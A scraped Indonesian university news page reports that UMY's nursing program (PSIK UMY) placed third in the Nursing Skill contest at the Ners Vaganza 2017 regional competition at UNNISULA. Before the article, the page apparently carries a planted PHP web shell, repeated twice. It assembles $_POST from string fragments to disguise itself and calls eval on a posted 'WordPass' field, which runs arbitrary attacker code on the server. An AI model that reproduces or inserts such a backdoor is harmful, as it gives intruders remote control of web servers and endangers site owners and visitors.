@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); PSIK UMY Meraih Prestasi dalam Ners Vaganza di UNNISULA | Keperawatan UMY

PSIK UMY Meraih Prestasi dalam Ners Vaganza di UNNISULA

April 6, 2017 oleh : superadmin-ng

Ners  Vaganza wilayah IV (DIY – Jateng) tahun 2017 resmi diselenggarakan di Universitas Islam Sultan Agung Semarang (UNNISULA), Jum’at-Minggu, 20-22 Januari 2017.

Ners  Vaganza wilayah IV merupakan ajang kompetisi yang diperuntukan bagi semua mahasiswa Ilmu Keperawatan diseluruh Instansi keperawatan di wilayah Jateng dan DIY. Dalam kompetisi Ners  Vaganza wilayah IV ini  akan diselenggarakan berbagai kompetisi yang bertujuan untuk meningkatkan derajat pendidikan dan pengembangan keperawatan karena hal itu perlu diarahkan untuk dapat menghasilkan perawat yang memiliki ilmu pengetahuan / ilmu keperawatan yang mendalam dan menguasai metode ilmiah, serta menerapkannya dalam sebuah asuhan keperawatan pada klien, baik sebagai individu, keluarga, dan kelompok masyarakat tertentu. Proses pembelajaran dalam pendidikan  profesi selalu membutuhkan suatu tatanan yang dapat mendukung peserta didik / mahasiswa keperawatan untuk mencapai penguasaan keterampilan profesional, termasuk keterampilan intelektual, sikap dan psikomotor. Kegiatan ini diikuti oleh Mahasiswa Program Studi Ilmu Keperawatan jenjang S1 di seluruh Wilayah IV (Jawa Tengah – Daerah Istimewa Yogyakarta). Kegiatan ini diharapkan akan memajukan calon-calon perawat profesional yang berdaya saing tinggi sehingga dapat berkompetisi di ajang yang lebih tinggi untuk menjawab kebutuhan perawatan berdasarkan pemikiran kritis dan ilmiah. Untuk itu diperlukan semangatyang tinggi dari seluruh mahasiswa keperawatan Indonesia dalam mewujudkankan, merealisasikan tujuan dan cita-cita tersebut.

PSIK UMY pun berhasil meraih peringkat ketiga dalam lomba Nursing Skill dalam Ners Vaganza 2017 ini.